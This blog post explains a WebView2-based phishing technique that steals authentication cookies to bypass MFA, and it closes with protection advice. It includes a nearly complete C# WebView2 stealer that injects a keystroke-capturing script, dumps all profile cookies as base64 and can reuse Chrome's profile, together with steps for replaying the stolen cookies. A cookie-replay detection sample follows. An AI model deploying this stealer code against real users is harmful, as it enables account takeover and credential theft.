Adrian Dolder

Phishing method bypasses MFA

A clever new phishing method bypasses MFA using Microsoft WebView2


Multi-factor authentication (MFA) is meant to protect against phishing as well and is generally considered robust: an attacker needs not only the username and password but also the second factor, usually the user's smartphone or a hardware key. A researcher has now demonstrated a way around this protection, and the building block that makes it possible comes from Microsoft, of all companies.



A newly published phishing technique uses Microsoft Edge WebView2 applications to steal a victim's authentication cookies, allowing an attacker to bypass multi-factor authentication (MFA) when logging into the stolen account.


Data breaches, remote access trojans and phishing campaigns have made stolen login credentials abundant. The increasing adoption of multi-factor authentication (MFA), however, has made these credentials hard to use unless the attacker also has access to the target's one-time MFA passcodes or security keys.

This has led threat actors and researchers to come up with new ways of bypassing MFA, including zero-day website vulnerabilities, reverse proxies, and clever tricks such as the Browser-in-the-Browser attack or using VNC to display a remote browser locally.


This week, security researcher mr.d0x published a new phishing method that uses Microsoft Edge WebView2 applications to steal a user's authentication cookies and log into the account, even if it is secured with MFA.



Microsoft Edge WebView2


This new social engineering attack is called WebView2-Cookie-Stealer and consists of a WebView2 executable that, when launched, opens a legitimate website's login form inside the application.


What is WebView2?


Microsoft Edge WebView2 is a browser control that makes life easier for application developers. Instead of shipping their own browser engine, they can embed a web view with full support for HTML, CSS and JavaScript directly in their native apps, using Microsoft Edge as the rendering engine.


The embedded view behaves like Microsoft Edge itself: an app can load any website, and it renders exactly as it would in Edge. The user therefore really does visit the page they want to log in to.

However, WebView2 also gives the hosting application direct access to the cookies of the loaded page and lets it inject JavaScript into it. That makes it easy to log keystrokes, read the authentication cookies after login and send them to a remote server. The attacker then only needs to import the cookies into their own browser and open the site, and they have full access, because the site takes the cookie as proof that the user has already authenticated.


How does Microsoft react to this report?


Microsoft rightly pointed out that the user has to execute a malicious file first. As experience shows, however, that is not a major obstacle for criminals.



How does such an attack work?


As shown below, the login form renders exactly as it does in a regular browser when signing in to a Microsoft Online Service, and it contains no suspicious elements such as typos or strange domain names.



Since the WebView2 application can inject JavaScript into the page, everything the user types can be sent straight back to the attacker's web server.


The real strength of this type of application, however, is its ability to capture all cookies set by the remote server after the user logs in, including the authentication cookies.


To do this, the application creates a Chromium User Data folder the first time it runs and then reuses that folder on every subsequent launch.

The malicious application then uses the built-in WebView2 interface "ICoreWebView2CookieManager" to export the website's cookies after a successful authentication and sends them back to the attacker-controlled server, as shown below.



Once the attacker has decoded the base64-encoded cookies, he has the complete set of authentication cookies for the website and can use them to log in to the user's account.



"WebView2 can be used to steal all available cookies for the current user. This was successfully tested on Chrome," explains a report on this technique by mr.d0x.

"WebView2 allows you to launch with an existing User Data Folder (UDF) rather than creating a new one. The UDF contains all passwords, sessions, bookmarks etc. Chrome's UDF is located at C:\Users\\AppData\Local\Google\Chrome\User Data.


We can simply tell WebView2 to start the instance using this profile and upon launch extract all cookies and transfer them to the attacker's server."
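To make the mechanism concrete, here is an added example of a WebView2 host application in C# (WinForms on .NET 6 with the Microsoft.Web.WebView2 NuGet package and the WebView2 Runtime installed). It is example code written for this page, not mr.d0x's PoC and not code from the original post. It shows the three building blocks described above: a script injected into every document that reports typed input back to the host, a dump of every cookie in the profile after each navigation, serialized as base64-encoded JSON, and a user data folder passed explicitly so that either a fresh folder or, as the quote above describes, an existing Chrome profile can be used. The target URL, decoy window title, folder path and output file names are assumptions; the export is written to local files instead of being posted to a server.

```csharp
using System;
using System.Collections.Generic;
using System.IO;
using System.Linq;
using System.Text;
using System.Text.Json;
using System.Threading.Tasks;
using System.Windows.Forms;
using Microsoft.Web.WebView2.Core;
using Microsoft.Web.WebView2.WinForms;

// Hypothetical WebView2 host (example code, not the PoC from the post).
public class LoginHostForm : Form
{
    private readonly WebView2 _webView = new WebView2 { Dock = DockStyle.Fill };

    // Assumed target: the real login page is loaded, so nothing looks off to the user.
    private const string TargetUrl = "https://login.microsoftonline.com/";

    // User data folder for the embedded browser. A fresh folder is created on first run;
    // pointing this at an existing Chrome "User Data" folder (as the quoted report
    // describes) reuses that profile instead. Path is an assumption.
    private static readonly string UserDataFolder =
        Path.Combine(Path.GetTempPath(), "ExampleHost.WebView2");

    // JavaScript injected before the page's own scripts run. Every change to an
    // <input> element is handed to the host via the WebView2 message channel.
    private const string InjectedScript = @"
        document.addEventListener('input', e => {
            const t = e.target;
            if (t && t.tagName === 'INPUT') {
                window.chrome.webview.postMessage(
                    JSON.stringify({ field: t.name || t.id, value: t.value }));
            }
        }, true);";

    public LoginHostForm()
    {
        Text = "Example Installer - Sign in";   // decoy title, assumption
        Width = 600;
        Height = 700;
        Controls.Add(_webView);
        Load += async (_, __) => await InitAsync();
    }

    private async Task InitAsync()
    {
        // Explicit environment so the user data folder is under our control.
        CoreWebView2Environment env =
            await CoreWebView2Environment.CreateAsync(null, UserDataFolder);
        await _webView.EnsureCoreWebView2Async(env);

        // 1) Keystroke capture: inject the script and receive its messages.
        await _webView.CoreWebView2.AddScriptToExecuteOnDocumentCreatedAsync(InjectedScript);
        _webView.CoreWebView2.WebMessageReceived += (_, e) =>
            File.AppendAllText("keystrokes.log",
                e.TryGetWebMessageAsString() + Environment.NewLine);

        // 2) Cookie export after every completed navigation; once the user has
        //    finished login and MFA, the session cookies are among them.
        _webView.CoreWebView2.NavigationCompleted += async (_, e) =>
        {
            if (e.IsSuccess) await DumpCookiesAsync();
        };

        _webView.CoreWebView2.Navigate(TargetUrl);
    }

    private async Task DumpCookiesAsync()
    {
        // A null URI returns all cookies in the profile, not only the current site's.
        List<CoreWebView2Cookie> cookies =
            await _webView.CoreWebView2.CookieManager.GetCookiesAsync(null);

        var export = cookies.Select(c => new
        {
            c.Name, c.Value, c.Domain, c.Path, c.IsSecure, c.IsHttpOnly, c.Expires
        });
        string json = JsonSerializer.Serialize(export);
        string b64 = Convert.ToBase64String(Encoding.UTF8.GetBytes(json));

        // The PoC described in the post sends this to a remote server; here it is
        // only written locally so the API usage can be inspected.
        File.WriteAllText("cookies.b64", b64);
    }

    [STAThread]
    public static void Main() => Application.Run(new LoginHostForm());
}
```

Note that every call above is a documented, intended use of the WebView2 API; nothing here exploits a bug, which is why Microsoft's answer is about not running untrusted executables rather than a patch. Because the cookies are read from the host process's own profile, HttpOnly and Secure flags offer no protection in this setting.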


The attacker can then open the login page of the target site in his own browser, import the stolen cookies with a Chrome extension such as "EditThisCookie", and simply refresh the page to be logged in automatically.


More worryingly, this attack also bypasses MFA based on OTPs or security keys, because the cookies are stolen after the user has logged in and successfully completed the multi-factor authentication challenge.


Let me explain briefly.


Assuming the attacker loads github.com/login in his WebView2 app and the user logs in there, the cookies can be extracted and transferred to the attacker's server.


YubiKeys can't save you here, because the user is authenticating to the REAL website, not to a phishing site.


Moreover, these cookies remain valid until the session expires or a post-authentication check detects unusual behavior.


So unless there are additional checks after authentication, the theft goes unnoticed, and such checks are not easy to implement.
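As an added example of the kind of post-authentication check the paragraph above refers to (example code for this page, not from the original post or from any product): at login the session cookie is bound to the client address and User-Agent it was issued to, and later requests carrying the same cookie from a different address or browser, or after the session lifetime has elapsed, are flagged. The event fields, the sample events and the eight-hour lifetime are constructed for illustration.

```csharp
using System;
using System.Collections.Generic;
using System.Linq;

// One authenticated request as seen by the web application (constructed schema).
public record SessionEvent(DateTime Time, string Session, string User, string Ip, string UserAgent);

public record Alert(DateTime Time, string Session, string User, string Reason);

public static class SessionReuseDetector
{
    // The first event for a session is treated as the login that issued the cookie;
    // every later event with that cookie is compared against it.
    public static List<Alert> Detect(IEnumerable<SessionEvent> events, TimeSpan sessionLifetime)
    {
        var alerts = new List<Alert>();
        foreach (var group in events.OrderBy(e => e.Time).GroupBy(e => e.Session))
        {
            SessionEvent issued = group.First();
            foreach (SessionEvent e in group.Skip(1))
            {
                if (e.Time - issued.Time > sessionLifetime)
                    alerts.Add(new Alert(e.Time, e.Session, e.User,
                        $"cookie used {e.Time - issued.Time} after issuance, beyond session lifetime"));
                else if (e.Ip != issued.Ip)
                    alerts.Add(new Alert(e.Time, e.Session, e.User,
                        $"cookie replayed from {e.Ip}, issued to {issued.Ip}"));
                else if (e.UserAgent != issued.UserAgent)
                    alerts.Add(new Alert(e.Time, e.Session, e.User,
                        $"user agent changed from '{issued.UserAgent}' to '{e.UserAgent}'"));
            }
        }
        return alerts;
    }

    public static void Main()
    {
        // Constructed sample: alice logs in through the WebView2 host (Edge-based UA),
        // keeps working, and twenty minutes later her cookie shows up from another
        // address with a different browser: the attacker after importing it.
        var events = new List<SessionEvent>
        {
            new(new DateTime(2022, 6, 27, 9, 0, 0),  "sess-a1", "alice", "203.0.113.10", "Edg/103"),
            new(new DateTime(2022, 6, 27, 9, 5, 0),  "sess-a1", "alice", "203.0.113.10", "Edg/103"),
            new(new DateTime(2022, 6, 27, 9, 20, 0), "sess-a1", "alice", "198.51.100.7", "Chrome/103"),
            new(new DateTime(2022, 6, 27, 9, 1, 0),  "sess-b2", "bob",   "203.0.113.11", "Firefox/101"),
        };

        foreach (Alert a in Detect(events, TimeSpan.FromHours(8)))
            Console.WriteLine($"{a.Time:HH:mm} {a.User} {a.Session}: {a.Reason}");
        // Expected: one alert for sess-a1 at 09:20, replayed from 198.51.100.7.
    }
}
```

Binding to a raw IP address is deliberately simple: mobile users and corporate proxies change addresses legitimately, so in production one would compare network/ASN or, better, bind the session to the device (for instance with device-bound tokens) so that an exported cookie is worthless outside the machine it was issued on. The example mainly shows why the check has to run on every request after login, not only at the MFA prompt.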



Social engineering is required to attack


However, this is a social engineering attack that requires the user to execute a malicious executable.


Microsoft explains: "This social engineering technique requires an attacker to convince a user to download and run a malicious application. We recommend users to practice safe computing habits, not to run or install applications from unknown or untrusted sources, and to always use and keep Microsoft Defender (or other anti-malware software) up-to-date."

Therefore, getting someone to launch an application in the first place can take additional effort.


However, history has shown us that many people "just run things" without thinking about the consequences, be it email attachments, random downloads from the Internet, cracks and warez, or game cheats.


All of these vectors have been proven to work with relatively little effort and have led to infections with ransomware, remote access Trojans, password-stealing Trojans and much more.


Therefore, the researcher's WebView2 attack is feasible, especially if it is disguised as a legitimate application installer that requires you to log in first, for example a fake Microsoft Office installer, a game or a Zoom client.


While this attack has not yet been observed in real-world campaigns, techniques published by this researcher have been picked up by attackers quickly in the past.



How to protect?


As for protecting against these attacks, the usual cybersecurity advice still applies.

  • Use an up-to-date protection program (like Microsoft Defender)

  • Do not open unknown attachments, especially if they are executable files

  • Do not open files that you have not downloaded or requested yourself - even from trusted contacts

  • Use only trusted sites to download programs

  • Scan files you download from the Internet

  • Open the corresponding pages yourself in the browser if you want to log in there

  • Enter your credentials into an application only if you are 100% sure that the program is legitimate

  • Be suspicious if you receive unsolicited emails with attachments

  • Do not open links if you do not know where they lead


How secure is your environment?

How secure is your email and Microsoft 365 environment?

Do you know where security gaps exist and data can leak out?


At my employer (GARAIO AG), we have developed a Microsoft 365 Security & Compliance Assessment that identifies existing security gaps based on recommendations in a clear and detailed report.


We are happy to support you with our know-how in the implementation of identity, data and information protection based on Microsoft tools.

Reach out for more information - send me an email or write me on LinkedIn


Talking Microsoft

A BLOG ABOUT SECURITY, EXCHANGE, TEAMS, MICROSOFT 365 AND MORE
